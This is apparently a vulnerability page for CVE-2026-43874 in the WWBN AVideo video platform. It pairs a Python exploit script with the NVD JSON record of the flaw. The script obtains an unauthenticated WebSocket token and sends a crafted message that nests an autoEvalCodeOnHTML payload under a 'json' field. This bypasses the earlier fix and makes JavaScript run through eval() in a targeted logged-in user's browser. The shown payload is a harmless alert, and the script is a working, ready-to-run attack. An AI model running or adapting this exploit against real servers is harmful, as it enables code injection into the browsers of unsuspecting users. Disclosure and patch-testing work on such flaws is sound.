CVE-2026-43874

import asyncio import websockets import requests import json # Target configuration TARGET_URL = "http://localhost/AVideo" TARGET_USER_ID = 1 # ID of the victim user async def exploit(): # Step 1: Get WebSocket Token print("[*] Fetching WebSocket token...") token_url = f"{TARGET_URL}/plugin/YPTSocket/getWebSocket.json.php" try: resp = requests.get(token_url) token_data = resp.json() ws_token = token_data.get('token') print(f"[+] Token obtained: {ws_token}") except Exception as e: print(f"[-] Failed to get token: {e}") return # Step 2: Connect to WebSocket # Note: Default WS port might be different, usually 8080 or similar depending on config ws_uri = f"ws://localhost:8080/?token={ws_token}" print(f"[*] Connecting to {ws_uri}...") try: async with websockets.connect(ws_uri) as websocket: print("[+] Connected.") # Step 3: Construct Bypass Payload # The vulnerability lies in checking $msg['json'] before $msg['msg']. # We put the payload in 'json' to bypass the strip logic. payload = { "json": { "autoEvalCodeOnHTML": "alert('CVE-2026-43874 RCE Bypass');" }, "to_users_id": TARGET_USER_ID, "msg": "safe_message" # This field would be stripped, but ignored } print(f"[*] Sending payload: {json.dumps(payload)}") await websocket.send(json.dumps(payload)) print("[+] Payload sent. Check victim's browser console.") # Keep connection open briefly to ensure delivery await asyncio.sleep(2) except Exception as e: print(f"[-] WebSocket error: {e}") if __name__ == "__main__": asyncio.run(exploit())

{"cve": {"id": "CVE-2026-43874", "sourceIdentifier": "[email protected]", "published": "2026-05-11T21:19:02.120", "lastModified": "2026-05-11T21:19:02.120", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, the server-side mitigation for the YPTSocket autoEvalCodeOnHTML eval sink (from CVE-2026-40911) only strips the payload when it sits under $json['msg'], but the relay function msgToResourceId() selects the outbound message from $msg['json'] before $msg['msg']. An unauthenticated attacker can obtain a WebSocket token from plugin/YPTSocket/getWebSocket.json.php, connect to the WebSocket server, and send a message with autoEvalCodeOnHTML nested under a top-level json field — the strip branch is skipped, the relay delivers the payload verbatim to any logged-in user identified by to_users_id, and the client script runs it through eval(). Commit 9f3006f9a89a34daa67a83c6ad35f450cb91fcce contains an updated fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/9f3006f9a89a34daa67a83c6ad35f450cb91fcce", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ghcv-22jf-vfxm", "source": "[email protected]"}]}}